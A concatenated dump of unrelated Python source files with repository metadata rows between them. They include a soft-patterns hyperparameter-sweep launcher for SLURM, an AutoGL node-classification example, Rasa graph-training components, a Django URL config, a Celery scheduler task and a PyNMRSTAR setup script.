all_args = [l.rstrip().split() for l in ifh]
all_args = [l if len(l) > 1 else [l[0], ''] for l in all_args]
n = reduce(mul, [len(x)-1 for x in all_args], 1)
print(all_args)
print("Got {} different configurations".format(n))
if indices_to_run is None:
indices_to_run = x = [i for i in range(starting_point, n)]
shuffle(indices_to_run)
indices_to_run = set(indices_to_run[:n_instances])
# print("In2run:", indices_to_run)
recursive_run_code(all_args, 0, 0, [], data_dir, indices_to_run, name, gpu)
def recursive_run_code(all_args, curr_param_index, curr_index, curr_values, data_dir, indices_to_run, name, gpu):
if curr_param_index == len(all_args):
curr_index += 1
if curr_index in indices_to_run:
run_code(all_args, curr_values, data_dir, name, curr_index, gpu)
# else:
# print(curr_index, "failed")
else:
for j in all_args[curr_param_index][1:]:
curr_values_tmp = copy.deepcopy(curr_values)
curr_values_tmp.append(j)
curr_index = recursive_run_code(all_args, curr_param_index + 1, curr_index, curr_values_tmp, data_dir,
indices_to_run, name, gpu)
return curr_index
def run_code(all_args, curr_values, data_dir, name, curr_index, gpu):
# print("Running", name, "with args", curr_values)
git_tag = os.popen('git log | head -n 1 | cut -d " " -f2 | cut -b -7').read().rstrip()
s = name + "." + str(curr_index)
odir = model_dir + "/output_"+s
args = ['python', '-u', 'soft_patterns.py', "--td", data_dir + "/train.data", "--tl", data_dir + "/train.labels",
"--vd", data_dir + "/dev.data", "--vl", data_dir + "/dev.labels",
"--model_save_dir", odir]
params = [[all_args[i][0], curr_values[i]] for i in range(len(all_args))]
# print("p is "+str(params))
params = [item for sublist in params for item in sublist]
args += params
# print(args)
HOSTNAME = os.environ['HOSTNAME'] if 'HOSTNAME' in os.environ else ''
cmd = " ".join(args)
if HOSTNAME.endswith('.stampede2.tacc.utexas.edu'):
f = gen_cluster_file(s, cmd)
os.system('sbatch' + f)
else:
if gpu != None:
os.environ['CUDA_VISIBLE_DEVICES'] = gpu
cmd += ' -g'
print(cmd)
of=model_dir+'logs/'+s + '_' + str(git_tag) + ".out"
if os.path.isfile(of):
print("Output file "+of+" found. Continuing")
else:
os.system(cmd+" |& tee "+of)
def gen_cluster_file(s, com):
f = model_dir + "/runs/"+s
print("Writing", f)
with open(f, 'w') as ofh:
ofh.write("#!/usr/bin/env bash\n")
ofh.write("#SBATCH -J "+s+"\n")
ofh.write("#SBATCH -o " + model_dir + "/logs/" + s + '_' + str(git_tag) + ".out\n")
ofh.write("#SBATCH -p normal\n") # specify queue
ofh.write("#SBATCH -N 1\n") # Number of nodes, not cores (16 cores/node)
ofh.write("#SBATCH -n 1\n")
ofh.write("#SBATCH -t 48:00:00\n") # max time
ofh.write("#SBATCH --mail-user=roysch@cs.washington.edu\n")
ofh.write("#SBATCH --mail-type=ALL\n")
ofh.write("#SBATCH -A TG-DBS110003 # project/allocation number;\n")
ofh.write("source activate torch3\n")
ofh.write("mpirun " + com + "\n")
return f
if __name__ == "__main__":
sys.exit(main(sys.argv))
| 31.076389 | 132 | 0.667486 |
import sys
import os
import os.path
import copy
import subprocess
from operator import mul
from random import shuffle
from operator import mul
from functools import reduce
dirs=['stanford_sentiment_binary', 'amazon_reviews', 'ROC_stories', 'stanford_sentiment_binary_100',
'stanford_sentiment_binary_500', 'stanford_sentiment_binary_1000', 'stanford_sentiment_binary_2500',
'amazon_reviews_100', 'amazon_reviews_500', 'amazon_reviews_1000', 'amazon_reviews_2500',
'amazon_reviews_5000', 'amazon_reviews_10000']
n_dirs=len(dirs)
WORK = os.environ['HOME']
model_dir = WORK + "/work/soft_patterns/"
resource_dir = WORK + "/resources/"
def main(args):
gpu = None
starting_point = 0
indices_to_run = None
if len(args) < 4:
print("Usage:", args[0], "<dataset> <file name> <n instsances> <gpu (optional)> <starting point = 0> <specific instances to run>")
print("Dirs are:")
for i in range(n_dirs):
print("{}: {}".format(i, dirs[i]))
return -1
elif len(args) > 4:
gpu = args[4]
if len(args) > 5:
starting_point = int(args[5])
if len(args) > 6:
indices_to_run = set([int(x) for x in args[6].split(",")])
ddir = dirs[int(args[1])]
data_dir = resource_dir + "/text_cat/" + ddir
n_instances = int(args[3])
file_name = args[2]
name = ddir+'_'+".".join(file_name.split("/")[-1].split(".")[:-1])
with open(file_name) as ifh:
all_args = [l.rstrip().split() for l in ifh]
all_args = [l if len(l) > 1 else [l[0], ''] for l in all_args]
n = reduce(mul, [len(x)-1 for x in all_args], 1)
print(all_args)
print("Got {} different configurations".format(n))
if indices_to_run is None:
indices_to_run = x = [i for i in range(starting_point, n)]
shuffle(indices_to_run)
indices_to_run = set(indices_to_run[:n_instances])
recursive_run_code(all_args, 0, 0, [], data_dir, indices_to_run, name, gpu)
def recursive_run_code(all_args, curr_param_index, curr_index, curr_values, data_dir, indices_to_run, name, gpu):
if curr_param_index == len(all_args):
curr_index += 1
if curr_index in indices_to_run:
run_code(all_args, curr_values, data_dir, name, curr_index, gpu)
else:
for j in all_args[curr_param_index][1:]:
curr_values_tmp = copy.deepcopy(curr_values)
curr_values_tmp.append(j)
curr_index = recursive_run_code(all_args, curr_param_index + 1, curr_index, curr_values_tmp, data_dir,
indices_to_run, name, gpu)
return curr_index
def run_code(all_args, curr_values, data_dir, name, curr_index, gpu):
git_tag = os.popen('git log | head -n 1 | cut -d " " -f2 | cut -b -7').read().rstrip()
s = name + "." + str(curr_index)
odir = model_dir + "/output_"+s
args = ['python', '-u', 'soft_patterns.py', "--td", data_dir + "/train.data", "--tl", data_dir + "/train.labels",
"--vd", data_dir + "/dev.data", "--vl", data_dir + "/dev.labels",
"--model_save_dir", odir]
params = [[all_args[i][0], curr_values[i]] for i in range(len(all_args))]
params = [item for sublist in params for item in sublist]
args += params
HOSTNAME = os.environ['HOSTNAME'] if 'HOSTNAME' in os.environ else ''
cmd = " ".join(args)
if HOSTNAME.endswith('.stampede2.tacc.utexas.edu'):
f = gen_cluster_file(s, cmd)
os.system('sbatch' + f)
else:
if gpu != None:
os.environ['CUDA_VISIBLE_DEVICES'] = gpu
cmd += ' -g'
print(cmd)
of=model_dir+'logs/'+s + '_' + str(git_tag) + ".out"
if os.path.isfile(of):
print("Output file "+of+" found. Continuing")
else:
os.system(cmd+" |& tee "+of)
def gen_cluster_file(s, com):
f = model_dir + "/runs/"+s
print("Writing", f)
with open(f, 'w') as ofh:
ofh.write("#!/usr/bin/env bash\n")
ofh.write("#SBATCH -J "+s+"\n")
ofh.write("#SBATCH -o " + model_dir + "/logs/" + s + '_' + str(git_tag) + ".out\n")
ofh.write("#SBATCH -p normal\n")
ofh.write("#SBATCH -N 1\n")
ofh.write("#SBATCH -n 1\n")
ofh.write("#SBATCH -t 48:00:00\n")
ofh.write("#SBATCH --mail-user=roysch@cs.washington.edu\n")
ofh.write("#SBATCH --mail-type=ALL\n")
ofh.write("#SBATCH -A TG-DBS110003 # project/allocation number;\n")
ofh.write("source activate torch3\n")
ofh.write("mpirun " + com + "\n")
return f
if __name__ == "__main__":
sys.exit(main(sys.argv))
| true | true |
f732550aa5d382fb0ee404be3464702f9e7a57b7 | 2,722 | py | Python | examples/node_classification.py | dedsec-9/AutoGL | 487f2b2f798b9b1363ad5dc100fb410b12222e06 | [
"MIT"
] | null | null | null | examples/node_classification.py | dedsec-9/AutoGL | 487f2b2f798b9b1363ad5dc100fb410b12222e06 | [
"MIT"
] | null | null | null | examples/node_classification.py | dedsec-9/AutoGL | 487f2b2f798b9b1363ad5dc100fb410b12222e06 | [
"MIT"
] | null | null | null | import yaml
import random
import torch.backends.cudnn
import numpy as np
from autogl.datasets import build_dataset_from_name
from autogl.solver import AutoNodeClassifier
from autogl.module import Acc
from autogl.backend import DependentBackend
if __name__ == "__main__":
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(
"auto node classification", formatter_class=ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"--dataset",
default="cora",
type=str,
help="dataset to use",
choices=[
"cora",
"pubmed",
"citeseer",
"coauthor_cs",
"coauthor_physics",
"amazon_computers",
"amazon_photo",
],
)
parser.add_argument(
"--configs",
type=str,
default="../configs/nodeclf_gcn_benchmark_small.yml",
help="config to use",
)
# following arguments will override parameters in the config file
parser.add_argument("--hpo", type=str, default="tpe", help="hpo methods")
parser.add_argument(
"--max_eval", type=int, default=50, help="max hpo evaluation times"
)
parser.add_argument("--seed", type=int, default=0, help="random seed")
parser.add_argument("--device", default=0, type=int, help="GPU device")
args = parser.parse_args()
if torch.cuda.is_available():
torch.cuda.set_device(args.device)
seed = args.seed
# set random seed
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
dataset = build_dataset_from_name(args.dataset)
label = dataset[0].nodes.data["y" if DependentBackend.is_pyg() else "label"]
num_classes = len(np.unique(label.numpy()))
configs = yaml.load(open(args.configs, "r").read(), Loader=yaml.FullLoader)
configs["hpo"]["name"] = args.hpo
configs["hpo"]["max_evals"] = args.max_eval
autoClassifier = AutoNodeClassifier.from_config(configs)
# train
if args.dataset in ["cora", "citeseer", "pubmed"]:
autoClassifier.fit(dataset, time_limit=3600, evaluation_method=[Acc])
else:
autoClassifier.fit(
dataset,
time_limit=3600,
evaluation_method=[Acc],
seed=seed,
train_split=20 * num_classes,
val_split=30 * num_classes,
balanced=False,
)
autoClassifier.get_leaderboard().show()
acc = autoClassifier.evaluate(metric="acc")
print("test acc: {:.4f}".format(acc))
| 32.404762 | 81 | 0.64144 | import yaml
import random
import torch.backends.cudnn
import numpy as np
from autogl.datasets import build_dataset_from_name
from autogl.solver import AutoNodeClassifier
from autogl.module import Acc
from autogl.backend import DependentBackend
if __name__ == "__main__":
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(
"auto node classification", formatter_class=ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"--dataset",
default="cora",
type=str,
help="dataset to use",
choices=[
"cora",
"pubmed",
"citeseer",
"coauthor_cs",
"coauthor_physics",
"amazon_computers",
"amazon_photo",
],
)
parser.add_argument(
"--configs",
type=str,
default="../configs/nodeclf_gcn_benchmark_small.yml",
help="config to use",
)
parser.add_argument("--hpo", type=str, default="tpe", help="hpo methods")
parser.add_argument(
"--max_eval", type=int, default=50, help="max hpo evaluation times"
)
parser.add_argument("--seed", type=int, default=0, help="random seed")
parser.add_argument("--device", default=0, type=int, help="GPU device")
args = parser.parse_args()
if torch.cuda.is_available():
torch.cuda.set_device(args.device)
seed = args.seed
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
dataset = build_dataset_from_name(args.dataset)
label = dataset[0].nodes.data["y" if DependentBackend.is_pyg() else "label"]
num_classes = len(np.unique(label.numpy()))
configs = yaml.load(open(args.configs, "r").read(), Loader=yaml.FullLoader)
configs["hpo"]["name"] = args.hpo
configs["hpo"]["max_evals"] = args.max_eval
autoClassifier = AutoNodeClassifier.from_config(configs)
if args.dataset in ["cora", "citeseer", "pubmed"]:
autoClassifier.fit(dataset, time_limit=3600, evaluation_method=[Acc])
else:
autoClassifier.fit(
dataset,
time_limit=3600,
evaluation_method=[Acc],
seed=seed,
train_split=20 * num_classes,
val_split=30 * num_classes,
balanced=False,
)
autoClassifier.get_leaderboard().show()
acc = autoClassifier.evaluate(metric="acc")
print("test acc: {:.4f}".format(acc))
| true | true |
f732557435b6dc4f0046e12a67a471a54ffca701 | 982 | py | Python | mysite/mysite/urls.py | BAXTOR95/blog_project | a167c9f63a33a5075a001de29720a58624fd1636 | [
"MIT"
] | 1 | 2021-03-30T07:51:30.000Z | 2021-03-30T07:51:30.000Z | mysite/mysite/urls.py | BAXTOR95/blog_project | a167c9f63a33a5075a001de29720a58624fd1636 | [
"MIT"
] | null | null | null | mysite/mysite/urls.py | BAXTOR95/blog_project | a167c9f63a33a5075a001de29720a58624fd1636 | [
"MIT"
] | 1 | 2021-01-16T13:48:39.000Z | 2021-01-16T13:48:39.000Z | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('blog.urls')),
path('accounts/login/', views.login, name='login'),
path('accounts/logout/', views.logout,
name='logout', kwargs={'next_page': '/'}),
]
| 36.37037 | 77 | 0.690428 | from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('blog.urls')),
path('accounts/login/', views.login, name='login'),
path('accounts/logout/', views.logout,
name='logout', kwargs={'next_page': '/'}),
]
| true | true |
f73255f453208be5b49bcb21a383512d9ef8a752 | 6,524 | py | Python | rasa/engine/training/components.py | Next-Trends/rasa | c06dc26b3a57dd1114b60aebcc9ccd3bbb8308d7 | [
"Apache-2.0"
] | 3,603 | 2017-05-21T18:34:55.000Z | 2019-04-16T11:58:09.000Z | rasa/engine/training/components.py | Next-Trends/rasa | c06dc26b3a57dd1114b60aebcc9ccd3bbb8308d7 | [
"Apache-2.0"
] | 2,782 | 2017-05-21T20:36:15.000Z | 2019-04-16T14:35:20.000Z | rasa/engine/training/components.py | Next-Trends/rasa | c06dc26b3a57dd1114b60aebcc9ccd3bbb8308d7 | [
"Apache-2.0"
] | 1,337 | 2017-05-21T18:10:33.000Z | 2019-04-16T09:14:42.000Z | from __future__ import annotations
from typing import Any, Dict, Optional, Text, Type
import dataclasses
import uuid
from rasa.engine.caching import Cacheable, TrainingCache
from rasa.engine.graph import ExecutionContext, GraphComponent, SchemaNode
from rasa.engine.storage.resource import Resource
from rasa.engine.storage.storage import ModelStorage
from rasa.engine.training import fingerprinting
class PrecomputedValueProvider(GraphComponent):
"""Holds the precomputed values of a `GraphNode` from a previous training.
Pre-computed values can either be
- values loaded from cache
- values which were provided during the fingerprint run by input nodes
"""
def __init__(self, output: Cacheable):
"""Initializes a `PrecomputedValueProvider`.
Args:
output: The precomputed output to return.
"""
self._output = output
@classmethod
def create(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
) -> PrecomputedValueProvider:
"""Creates instance (see parent class for full docstring)."""
return cls(output=config["output"])
def get_value(self) -> Cacheable:
"""Returns the precomputed output."""
return self._output
@classmethod
def replace_schema_node(cls, node: SchemaNode, output: Any) -> None:
"""Updates a `SchemaNode` to use a `PrecomputedValueProvider`.
This is for when we want to use the precomputed output value of a node from a
previous training in a subsequent training. We replace the class in the `uses`
of the node to a be a `PrecomputedValueProvider` configured to return the
precomputed value.
Args:
node: The node to update.
output: precomputed cached output that the `PrecomputedValueProvider` will
return.
"""
node.uses = cls
node.config = {"output": output}
node.fn = cls.get_value.__name__
node.constructor_name = cls.create.__name__
@dataclasses.dataclass
class FingerprintStatus:
"""Holds the output of a `FingerprintComponent` and is used to prune the graph.
Attributes:
output_fingerprint: A fingerprint of the node's output value.
is_hit: `True` if node's fingerprint key exists in the cache, `False` otherwise.
"""
output_fingerprint: Optional[Text]
is_hit: bool
def fingerprint(self) -> Text:
"""Returns the internal fingerprint.
If there is no fingerprint returns a random string that will never match.
"""
return self.output_fingerprint or uuid.uuid4().hex
class FingerprintComponent(GraphComponent):
"""Replaces non-input nodes during a fingerprint run."""
def __init__(
self,
cache: TrainingCache,
config_of_replaced_component: Dict[Text, Any],
class_of_replaced_component: Type,
) -> None:
"""Initializes a `FingerprintComponent`.
Args:
cache: Training cache used to determine if the run is a hit or not.
config_of_replaced_component: Needed to generate the fingerprint key.
class_of_replaced_component: Needed to generate the fingerprint key.
"""
self._cache = cache
self._config_of_replaced_component = config_of_replaced_component
self._class_of_replaced_component = class_of_replaced_component
@classmethod
def create(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
) -> FingerprintComponent:
"""Creates a `FingerprintComponent` (see parent class for full docstring)."""
return cls(
cache=config["cache"],
config_of_replaced_component=config["config_of_replaced_component"],
class_of_replaced_component=config["graph_component_class"],
)
def run(self, **kwargs: Any) -> FingerprintStatus:
"""Calculates the fingerprint key to determine if cached output can be used.
If the fingerprint key matches an entry in the cache it means that there has
been a previous node execution which matches the same component class, component
config and input values. This means that we can potentially prune this node
from the schema, or replace it with a cached value before the next graph run.
Args:
**kwargs: Inputs from all parent nodes.
Returns:
A `FingerprintStatus` determining if the run was a hit, and if it was a hit
also the output fingerprint from the cache.
"""
fingerprint_key = fingerprinting.calculate_fingerprint_key(
graph_component_class=self._class_of_replaced_component,
config={
**self._class_of_replaced_component.get_default_config(),
**self._config_of_replaced_component,
},
inputs=kwargs,
)
output_fingerprint = self._cache.get_cached_output_fingerprint(fingerprint_key)
return FingerprintStatus(
is_hit=output_fingerprint is not None, output_fingerprint=output_fingerprint
)
@classmethod
def replace_schema_node(cls, node: SchemaNode, cache: TrainingCache) -> None:
"""Updates a `SchemaNode` to use a `FingerprintComponent`.
This is for when we want to do a fingerprint run. During the fingerprint run we
replace all non-input nodes with `FingerprintComponent`s so we can determine
whether they are able to be pruned or cached before the next graph run without
running the actual components.
Args:
node: The node to update.
cache: The cache is needed to determine of there is cache hit for the
fingerprint key.
"""
graph_component_class = node.uses
node.uses = cls
# We update the node to be "eager" so that `FingerprintComponent.run` sees
# ALL the inputs to the node. If it was not eager, we would miss any args used
# by the constructor.
node.eager = True
node.constructor_name = cls.create.__name__
node.fn = cls.run.__name__
node.config = {
"config_of_replaced_component": node.config,
"cache": cache,
"graph_component_class": graph_component_class,
}
| 36.858757 | 88 | 0.667689 | from __future__ import annotations
from typing import Any, Dict, Optional, Text, Type
import dataclasses
import uuid
from rasa.engine.caching import Cacheable, TrainingCache
from rasa.engine.graph import ExecutionContext, GraphComponent, SchemaNode
from rasa.engine.storage.resource import Resource
from rasa.engine.storage.storage import ModelStorage
from rasa.engine.training import fingerprinting
class PrecomputedValueProvider(GraphComponent):
def __init__(self, output: Cacheable):
self._output = output
@classmethod
def create(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
) -> PrecomputedValueProvider:
return cls(output=config["output"])
def get_value(self) -> Cacheable:
return self._output
@classmethod
def replace_schema_node(cls, node: SchemaNode, output: Any) -> None:
node.uses = cls
node.config = {"output": output}
node.fn = cls.get_value.__name__
node.constructor_name = cls.create.__name__
@dataclasses.dataclass
class FingerprintStatus:
output_fingerprint: Optional[Text]
is_hit: bool
def fingerprint(self) -> Text:
return self.output_fingerprint or uuid.uuid4().hex
class FingerprintComponent(GraphComponent):
def __init__(
self,
cache: TrainingCache,
config_of_replaced_component: Dict[Text, Any],
class_of_replaced_component: Type,
) -> None:
self._cache = cache
self._config_of_replaced_component = config_of_replaced_component
self._class_of_replaced_component = class_of_replaced_component
@classmethod
def create(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
) -> FingerprintComponent:
return cls(
cache=config["cache"],
config_of_replaced_component=config["config_of_replaced_component"],
class_of_replaced_component=config["graph_component_class"],
)
def run(self, **kwargs: Any) -> FingerprintStatus:
fingerprint_key = fingerprinting.calculate_fingerprint_key(
graph_component_class=self._class_of_replaced_component,
config={
**self._class_of_replaced_component.get_default_config(),
**self._config_of_replaced_component,
},
inputs=kwargs,
)
output_fingerprint = self._cache.get_cached_output_fingerprint(fingerprint_key)
return FingerprintStatus(
is_hit=output_fingerprint is not None, output_fingerprint=output_fingerprint
)
@classmethod
def replace_schema_node(cls, node: SchemaNode, cache: TrainingCache) -> None:
graph_component_class = node.uses
node.uses = cls
node.eager = True
node.constructor_name = cls.create.__name__
node.fn = cls.run.__name__
node.config = {
"config_of_replaced_component": node.config,
"cache": cache,
"graph_component_class": graph_component_class,
}
| true | true |
f732568bc73bb8b78f184a2659fa83180b3c902d | 367 | py | Python | 10420/10420.py | Keilan/uva | 4218328466c3ab2fdf34cdf45fc7a8dea90964bc | [
"MIT"
] | null | null | null | 10420/10420.py | Keilan/uva | 4218328466c3ab2fdf34cdf45fc7a8dea90964bc | [
"MIT"
] | null | null | null | 10420/10420.py | Keilan/uva | 4218328466c3ab2fdf34cdf45fc7a8dea90964bc | [
"MIT"
] | null | null | null | import sys
n = int(sys.stdin.readline())
countries = {}
for _ in range(n):
country = sys.stdin.readline().split()[0]
#Add to the current value (or 0 if not present)
countries[country] = countries.get(country, 0) + 1
#Order keys alphabetically
keys = sorted(countries.keys())
for k in keys:
print('{} {}'.format(k,countries[k]))
| 20.388889 | 55 | 0.623978 | import sys
n = int(sys.stdin.readline())
countries = {}
for _ in range(n):
country = sys.stdin.readline().split()[0]
countries[country] = countries.get(country, 0) + 1
keys = sorted(countries.keys())
for k in keys:
print('{} {}'.format(k,countries[k]))
| true | true |
f73256e3b561a6f89abbc2dc5ccfdde8a6475f77 | 1,135 | py | Python | portia_server/portia_dashboard/tasks.py | rmdes/portia-dashboard | 97e698c7232c15eff47d20fd3529251bbd284226 | [
"BSD-3-Clause"
] | 223 | 2018-01-22T07:43:58.000Z | 2022-03-25T12:52:30.000Z | portia_server/portia_dashboard/tasks.py | rmdes/portia-dashboard | 97e698c7232c15eff47d20fd3529251bbd284226 | [
"BSD-3-Clause"
] | 9 | 2018-03-17T15:16:26.000Z | 2019-11-11T09:35:04.000Z | portia_server/portia_dashboard/tasks.py | rmdes/portia-dashboard | 97e698c7232c15eff47d20fd3529251bbd284226 | [
"BSD-3-Clause"
] | 76 | 2018-01-22T04:20:00.000Z | 2021-11-13T09:53:26.000Z | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from .models import Schedule
from celery.task.schedules import crontab
from celery import shared_task
from celery import task
import logging
import time, datetime
import requests
logger = logging.getLogger('portia_dashboard')
@task
def schedule_monitor():
schedules = Schedule.objects.all()
for schedule in schedules:
nowTimestamp = int(time.time() * 1000)
if (nowTimestamp - schedule.date_update > schedule.interval * 1000) and (schedule.times > 0 or schedule.times < 0 ) :
if schedule.start_time > 0 and schedule.start_time > nowTimestamp:
continue
schedule_data = {
'project': schedule.project,
'spider': schedule.spider
}
request = requests.post(settings.SCHEDULE_URL, data=schedule_data)
if request.status_code == 200:
schedule.date_update = nowTimestamp
schedule.times = schedule.times -1 if ( schedule.times > 0 ) else schedule.times
schedule.save()
| 31.527778 | 125 | 0.663436 | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from .models import Schedule
from celery.task.schedules import crontab
from celery import shared_task
from celery import task
import logging
import time, datetime
import requests
logger = logging.getLogger('portia_dashboard')
@task
def schedule_monitor():
schedules = Schedule.objects.all()
for schedule in schedules:
nowTimestamp = int(time.time() * 1000)
if (nowTimestamp - schedule.date_update > schedule.interval * 1000) and (schedule.times > 0 or schedule.times < 0 ) :
if schedule.start_time > 0 and schedule.start_time > nowTimestamp:
continue
schedule_data = {
'project': schedule.project,
'spider': schedule.spider
}
request = requests.post(settings.SCHEDULE_URL, data=schedule_data)
if request.status_code == 200:
schedule.date_update = nowTimestamp
schedule.times = schedule.times -1 if ( schedule.times > 0 ) else schedule.times
schedule.save()
| true | true |
f7325868460a157150006054167b4d86c914b192 | 2,535 | py | Python | setup.py | uwbmrb/PyNMRSTAR | c6e3cdccb4aa44dfbc3b4e984837a6bcde3cf171 | [
"MIT"
] | 16 | 2017-02-02T05:00:50.000Z | 2021-05-25T11:13:15.000Z | setup.py | uwbmrb/PyNMRSTAR | c6e3cdccb4aa44dfbc3b4e984837a6bcde3cf171 | [
"MIT"
] | 29 | 2016-07-14T21:02:18.000Z | 2021-06-26T17:24:07.000Z | setup.py | bmrb-io/PyNMRSTAR | 55df5bf7de192e7a6c95f37e0756f09e3f504170 | [
"MIT"
] | 4 | 2016-04-14T16:29:49.000Z | 2017-02-28T02:01:57.000Z | #!/usr/bin/env python3
import os
from setuptools import setup, Extension
def get_version():
internal_file_location = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'pynmrstar', '_internal.py')
with open(internal_file_location, 'r') as internal_file:
for line in internal_file:
if line.startswith('__version__'):
delim = '"' if '"' in line else "'"
return line.split(delim)[1]
else:
raise RuntimeError("Unable to find version string.")
# Should fail if the readme is missing
long_des = open('README.rst', 'r').read()
cnmrstar = Extension('cnmrstar',
sources=['c/cnmrstarmodule.c'],
extra_compile_args=["-funroll-loops", "-O3"],
optional=True)
setup(name='pynmrstar',
version=get_version(),
packages=['pynmrstar'],
ext_modules=[cnmrstar],
install_requires=['requests>=2.21.0,<=3'],
python_requires='>=3.6',
author='Jon Wedell',
author_email='wedell@uchc.edu',
description='PyNMR-STAR provides tools for reading, writing, modifying, and interacting with NMR-STAR files. '
'Maintained by the BMRB.',
long_description=long_des,
long_description_content_type='text/x-rst',
keywords=['bmrb', 'parser', 'nmr', 'nmrstar', 'biomagresbank', 'biological magnetic resonance bank'],
url='https://github.com/uwbmrb/PyNMRSTAR',
license='MIT',
package_data={'pynmrstar': ['reference_files/schema.csv',
'reference_files/comments.str',
'reference_files/data_types.csv']},
classifiers=[
'Development Status :: 6 - Mature',
'Environment :: Console',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 39.609375 | 116 | 0.586588 |
import os
from setuptools import setup, Extension
def get_version():
internal_file_location = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'pynmrstar', '_internal.py')
with open(internal_file_location, 'r') as internal_file:
for line in internal_file:
if line.startswith('__version__'):
delim = '"' if '"' in line else "'"
return line.split(delim)[1]
else:
raise RuntimeError("Unable to find version string.")
# Should fail if the readme is missing
long_des = open('README.rst', 'r').read()
cnmrstar = Extension('cnmrstar',
sources=['c/cnmrstarmodule.c'],
extra_compile_args=["-funroll-loops", "-O3"],
optional=True)
setup(name='pynmrstar',
version=get_version(),
packages=['pynmrstar'],
ext_modules=[cnmrstar],
install_requires=['requests>=2.21.0,<=3'],
python_requires='>=3.6',
author='Jon Wedell',
author_email='wedell@uchc.edu',
description='PyNMR-STAR provides tools for reading, writing, modifying, and interacting with NMR-STAR files. '
'Maintained by the BMRB.',
long_description=long_des,
long_description_content_type='text/x-rst',
keywords=['bmrb', 'parser', 'nmr', 'nmrstar', 'biomagresbank', 'biological magnetic resonance bank'],
url='https://github.com/uwbmrb/PyNMRSTAR',
license='MIT',
package_data={'pynmrstar': ['reference_files/schema.csv',
'reference_files/comments.str',
'reference_files/data_types.csv']},
classifiers=[
'Development Status :: 6 - Mature',
'Environment :: Console',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| true | true |
f73258eae4d5169d7051cca79bea9e0c5febac33 | 20 | py | Python | upconvert/parser/t/__init__.py | lehaianh1986/schematic-file-converter | ed67274511a5b0e1b378e4e0fd3943ec8a189f43 | [
"Apache-2.0"
] | 29 | 2016-05-19T02:04:51.000Z | 2021-09-16T06:25:59.000Z | upconvert/parser/t/__init__.py | 84ace/schematic-file-converter | a5975a521d842396605c05a9f197bfe088906bb4 | [
"Apache-2.0"
] | null | null | null | upconvert/parser/t/__init__.py | 84ace/schematic-file-converter | a5975a521d842396605c05a9f197bfe088906bb4 | [
"Apache-2.0"
] | 24 | 2016-05-19T02:05:00.000Z | 2022-01-14T18:20:01.000Z | """ Parser tests """ | 20 | 20 | 0.55 | true | true | |
f732596a48cb52363db0bf4dd853807f96f22319 | 4,315 | py | Python | benchmarks/image_recognition/tensorflow_serving/inceptionv3/inference/fp32/image_recognition_benchmark.py | hekaplex/resnet_dl | fc8d4dcc0adffbe22d01d333e6cf5db955f2f011 | [
"Apache-2.0"
] | null | null | null | benchmarks/image_recognition/tensorflow_serving/inceptionv3/inference/fp32/image_recognition_benchmark.py | hekaplex/resnet_dl | fc8d4dcc0adffbe22d01d333e6cf5db955f2f011 | [
"Apache-2.0"
] | null | null | null | benchmarks/image_recognition/tensorflow_serving/inceptionv3/inference/fp32/image_recognition_benchmark.py | hekaplex/resnet_dl | fc8d4dcc0adffbe22d01d333e6cf5db955f2f011 | [
"Apache-2.0"
] | null | null | null | #
# -*- coding: utf-8 -*-
#
# Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
